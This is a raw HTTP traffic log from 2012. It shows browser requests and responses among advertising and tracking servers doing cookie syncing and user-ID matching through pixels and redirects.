P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:43 GMT; Path=/ pb_rtb_ev=2-535461..0.0.1353202242915|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:43 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /server/pixel.htm?fpid=12 HTTP/1.1

Host: ad.turn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: text/html;charset=UTF-8
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3788424827722360895; Domain=.turn.com; Expires=Fri, 17-May-2013 01:30:43 GMT; Path=/
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Sun, 18 Nov 2012 01:30:42 GMT
GET /server/ddc.htm?uid=3788424827722360895&rnd=3716367233684432959&fpid=12&nu=y&t=&sp=n&purl=&ctid=3&cyid=11 HTTP/1.1

Host: cdn.turn.com
GET /server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.turn.com/server/pixel.htm?fpid=12
Cookie: uid=3788424827722360895
HTTP/1.1 200 OK

Content-Type: text/html;charset=UTF-8
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Pragma: no-cache
Content-Encoding: gzip
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 18 Nov 2012 01:30:43 GMT
Content-Length: 4145
Connection: keep-alive
Vary: Accept-Encoding
GET /html/fullpage/js/date.js HTTP/1.1

Host: player.production.s3.amazonaws.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
x-amz-id-2: 6EmEdZRmThBFNqXIlqW6ffw0IwyL+zVKZm27JTN4//QYKX3sK3K/+M8XIxh+/LXp
x-amz-request-id: 4A5E140238E27A55
Date: Sun, 18 Nov 2012 01:30:44 GMT
x-amz-meta-cb-modifiedtime: Sat, 01 Sep 2012 13:22:28 GMT
Last-Modified: Sat, 08 Sep 2012 12:31:04 GMT
Etag: &quot;497166e7f447a56c7b279271c6c6e6c8&quot;
Accept-Ranges: bytes
Content-Length: 25809
Server: AmazonS3
GET /pixel?google_nid=turn1&google_cm&google_sc&google_hm=Mzc4ODQyNDgyNzcyMjM2MDg5NQ== HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=turn1&amp;google_cm&amp;google_sc&amp;google_hm=Mzc4ODQyNDgyNzcyMjM2MDg5NQ== HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/18/uid/?google_gid=CAESED7yEyqvwHaZ756lIOe7tfw&amp;google_cver=1
Date: Sun, 18 Nov 2012 01:30:43 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 300
X-XSS-Protection: 1; mode=block
GET /ptj?member=514&size=160x600&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D653070%26r%3D0%26_salt%3D1916686269%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=514&amp;size=160x600&amp;referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;inv_code=653070&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D653070%26r%3D0%26_salt%3D1916686269%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:43 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:43 GMT; domain=.adnxs.com; HttpOnly icu=ChII64YEEAoYASABKAEww_SghQUQw_SghQUYAA..; path=/; expires=Sat, 16-Feb-2013 01:30:43 GMT; domain=.adnxs.com; HttpOnly acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Mon, 19-Nov-2012 01:30:43 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bh#s4^=K; path=/; expires=Sat, 16-Feb-2013 01:30:43 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 18 Nov 2012 01:30:43 GMT
Content-Length: 548
GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1

Host: ib.adnxs.com
GET /getuid?http://r.turn.com/r/bd?ddc=1&amp;pid=54&amp;cver=1&amp;uid=$UID HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:43 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:43 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&amp;pid=54&amp;cver=1&amp;uid=5858721859426781856
Date: Sun, 18 Nov 2012 01:30:43 GMT
Content-Length: 0
GET /bh/rtset?do=add&pid=535461&ev=3788424827722360895 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=535461&amp;ev=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=1; wf=0; pb_rtb_ev=2-535461..0.0.1353202242915|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-37-63-220
Date: Sun, 18 Nov 2012 01:30:42 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:43 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|535039..0.0.1353202242915|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:43 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:3788424827722360895 HTTP/1.1

Host: image2.pubmatic.com
GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&amp;piggybackCookie=pcv:1|uid:3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: PUBMDCID=3; KADUSERCOOKIE=7577C4DA-3995-4153-9A0B-7C9927BF1013; pubfreq_28597=; pubtime_28597=TMC; _curtime=1353202243; pubfreq_28597_24364_1667996297=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_80=1336-3f62d100-dd98-4006-b187-452598b27a1b.; PUBRETARGET=390_1360978240; pubfreq_28597_24363_840544334=243-1
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3788424827722360895; domain=pubmatic.com; expires=Tue, 18-Nov-2014 01:30:43 GMT; path=/ PUBRETARGET=390_1360978240.82_1447810243; domain=pubmatic.com; expires=Wed, 18-Nov-2015 01:30:43 GMT; path=/
Content-Length: 1
P3P: CP=&quot;NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC&quot;
Connection: close
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3788424827722360895 HTTP/1.1

Host: r.openx.net
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=49f60e71-671f-4f51-bac3-546f5c07b50d; expires=Tue, 18-Nov-2014 01:30:43 GMT; path=/; domain=.openx.net
Location: /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3788424827722360895&amp;cc=1
Content-Length: 0
Connection: close
GET /match?admeld_adprovider_id=24&external_user_id=3788424827722360895 HTTP/1.1

Host: tag.admeld.com
GET /match?admeld_adprovider_id=24&amp;external_user_id=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: meld_sess=bbeaaa1b-8eda-4510-8721-df07b3f95b13
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
P3P: policyref=&quot;http://tag.admeld.com/w3c/p3p.xml&quot;, CP=&quot;PSAo PSDo OUR SAM OTR BUS DSP ALL COR&quot;
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:43 GMT
Connection: keep-alive
GET /tap.php?v=4212&nid=1185&put=3788424827722360895&expires=60 HTTP/1.1

Host: pixel.rubiconproject.com
GET /tap.php?v=4212&amp;nid=1185&amp;put=3788424827722360895&amp;expires=60 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Set-Cookie: rpb=4212%3D1; expires=Tue, 18-Dec-2012 01:30:43 GMT; path=/; domain=.rubiconproject.com rpx=4212%3D25241%2C0%2C1%2C%2C; expires=Tue, 18-Dec-2012 01:30:43 GMT; path=/; domain=.pixel.rubiconproject.com put_1185=3788424827722360895; expires=Thu, 17-Jan-2013 01:30:43 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Keep-Alive: timeout=30, max=8381
Connection: Keep-Alive
GET /r/pu?&pid=4&tuid=3788424827722360895 HTTP/1.1

Host: turn.nexac.com
GET /r/pu?&amp;pid=4&amp;tuid=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:43 GMT
GET /adscale-ih/tpui?tpid=30&tpuid=3788424827722360895 HTTP/1.1

Host: ih.adscale.de
GET /adscale-ih/tpui?tpid=30&amp;tpuid=3788424827722360895 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uu=421681350344862462
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: CP=NOI PSA OUR
Expires: Sun, 18 Nov 2012 01:30:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:43 GMT
Content-Length: 49
Connection: keep-alive
Set-Cookie: uu=421681350344862462; Domain=.adscale.de; Expires=Fri, 15-Nov-2013 17:57:23 GMT; Path=/ tu=1#3627578027#30~3788424827722360895~15662; Expires=Tue, 18-Dec-2012 01:30:43 GMT VAR=x0JvnytHD3rj9XvJko9s0i97rrBIbB6/; path=/; domain=ih.adscale.de DCID=node07; path=/; domain=ih.adscale.de
GET /r/cms/id/0/ddc/1/pid/18/uid/?google_gid=CAESED7yEyqvwHaZ756lIOe7tfw&google_cver=1 HTTP/1.1

Host: r.turn.com
GET /r/cms/id/0/ddc/1/pid/18/uid/?google_gid=CAESED7yEyqvwHaZ756lIOe7tfw&amp;google_cver=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uid=3788424827722360895; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12%7Cundefined%7Cundefined%7Cundefined%7C13%7C14%7C15%7Cundefined%7Cundefined%7C16%7C18%7C21%7Cundefined%7Cundefined%7Cundefined%7C26%7Cundefined%7C27; rds=15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7C15662%7Cundefined%7Cundefined%7C15662%7Cundefined%7Cundefined%7Cundefined%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7Cundefined%7C15662%7Cundefined%7C15662; rv=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3788424827722360895; Domain=.turn.com; Expires=Fri, 17-May-2013 01:30:43 GMT; Path=/
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:43 GMT
GET /r/bd?ddc=1&pid=54&cver=1&uid=5858721859426781856 HTTP/1.1

Host: r.turn.com
GET /r/bd?ddc=1&amp;pid=54&amp;cver=1&amp;uid=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uid=3788424827722360895; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12%7Cundefined%7Cundefined%7Cundefined%7C13%7C14%7C15%7Cundefined%7Cundefined%7C16%7C18%7C21%7Cundefined%7Cundefined%7Cundefined%7C26%7Cundefined%7C27; rds=15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7C15662%7Cundefined%7Cundefined%7C15662%7Cundefined%7Cundefined%7Cundefined%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7Cundefined%7C15662%7Cundefined%7C15662; rv=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3788424827722360895; Domain=.turn.com; Expires=Fri, 17-May-2013 01:30:43 GMT; Path=/
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:42 GMT
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=3788424827722360895&cc=1 HTTP/1.1

Host: r.openx.net
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=3788424827722360895&amp;cc=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
